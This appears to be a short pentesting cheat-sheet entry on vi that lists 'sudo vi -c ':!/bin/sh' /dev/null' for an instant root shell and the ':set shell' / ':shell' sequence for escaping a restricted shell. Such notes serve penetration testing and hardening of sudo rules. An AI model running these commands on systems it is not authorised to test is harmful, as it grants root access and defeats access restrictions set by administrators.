vi

#insta root

sudo vi -c ':!/bin/sh' /dev/null

#Escaping shell

vi
:set shell=/bin/sh
:shell

Last updated